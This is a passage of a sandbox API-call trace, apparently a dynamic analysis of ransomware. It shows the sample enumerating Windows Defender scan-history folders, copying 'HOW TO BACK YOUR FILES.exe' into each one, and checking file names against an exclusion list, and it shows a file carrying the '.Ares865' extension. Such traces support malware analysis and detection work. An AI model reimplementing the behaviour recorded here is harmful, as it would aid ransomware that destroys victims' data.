ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.170] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.170] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.170] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.170] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.170] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" [0090.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77a8 | out: hHeap=0x2b0000) returned 1 [0090.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.170] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned 76 [0090.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" [0090.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.171] GetLastError () returned 0x0 [0090.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.171] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.171] CloseHandle (hObject=0x120) returned 1 [0090.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.171] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.171] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.171] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.171] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.171] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.171] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2="aoldtz.exe") returned 1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2=".") returned 1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2="..") returned 1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2="windows") returned -1 [0090.171] lstrcmpiW (lpString1="CacheManager", lpString2="bootmgr") returned 1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="temp") returned -1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="pagefile.sys") returned -1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="boot") returned 1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="ids.txt") returned -1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="ntuser.dat") returned -1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="perflogs") returned -1 [0090.172] lstrcmpiW (lpString1="CacheManager", lpString2="MSBuild") returned -1 [0090.172] lstrlenW (lpString="CacheManager") returned 12 [0090.172] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 78 [0090.172] lstrcpyW (in: lpString1=0x2cce49a, lpString2="CacheManager" | out: lpString1="CacheManager") returned="CacheManager" [0090.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0090.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f2fc8 [0090.172] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0090.172] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.172] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.172] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Results", cAlternateFileName="")) returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="aoldtz.exe") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2=".") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="..") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="windows") returned -1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="bootmgr") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="temp") returned -1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="pagefile.sys") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="boot") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="ids.txt") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="ntuser.dat") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="perflogs") returned 1 [0090.172] lstrcmpiW (lpString1="Results", lpString2="MSBuild") returned 1 [0090.172] lstrlenW (lpString="Results") returned 7 [0090.172] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 89 [0090.172] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Results" | out: lpString1="Results") returned="Results" [0090.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2c8eb8 [0090.172] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.172] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Service", cAlternateFileName="")) returned 1 [0090.172] lstrcmpiW (lpString1="Service", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="aoldtz.exe") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2=".") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="..") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="windows") returned -1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="bootmgr") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="temp") returned -1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="pagefile.sys") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="boot") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="ids.txt") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="ntuser.dat") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="perflogs") returned 1 [0090.173] lstrcmpiW (lpString1="Service", lpString2="MSBuild") returned 1 [0090.173] lstrlenW (lpString="Service") returned 7 [0090.173] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 84 [0090.173] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Service" | out: lpString1="Service") returned="Service" [0090.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0090.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2e87c0 [0090.173] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0090.173] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="aoldtz.exe") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2=".") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="..") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="windows") returned -1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="bootmgr") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="temp") returned -1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="pagefile.sys") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="boot") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="ids.txt") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="ntuser.dat") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="perflogs") returned 1 [0090.173] lstrcmpiW (lpString1="Store", lpString2="MSBuild") returned 1 [0090.173] lstrlenW (lpString="Store") returned 5 [0090.173] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 84 [0090.173] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Store" | out: lpString1="Store") returned="Store" [0090.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0090.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e27c0 [0090.174] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0090.174] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 0 [0090.174] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.174] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0090.174] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0090.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0090.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0090.174] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 82 [0090.174] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0090.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.174] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\store\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.174] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.175] GetLastError () returned 0x0 [0090.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.175] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.175] CloseHandle (hObject=0x120) returned 1 [0090.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.175] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.175] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.175] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.175] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.175] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.175] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.175] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.175] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.175] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0090.175] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0090.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0090.175] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 84 [0090.175] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0090.176] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.176] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\scans\\history\\service\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.176] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.176] GetLastError () returned 0x0 [0090.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.176] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.176] CloseHandle (hObject=0x120) returned 1 [0090.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.176] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.176] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.177] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb9820270, ftCreationTime.dwHighDateTime=0x1d2faf0, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x310, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History.Log.Ares865", cAlternateFileName="HISTOR~1.ARE")) returned 1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="aoldtz.exe") returned 1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2=".") returned 1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="..") returned 1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="windows") returned -1 [0090.177] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="bootmgr") returned 1 [0090.177] lstrcmpiW 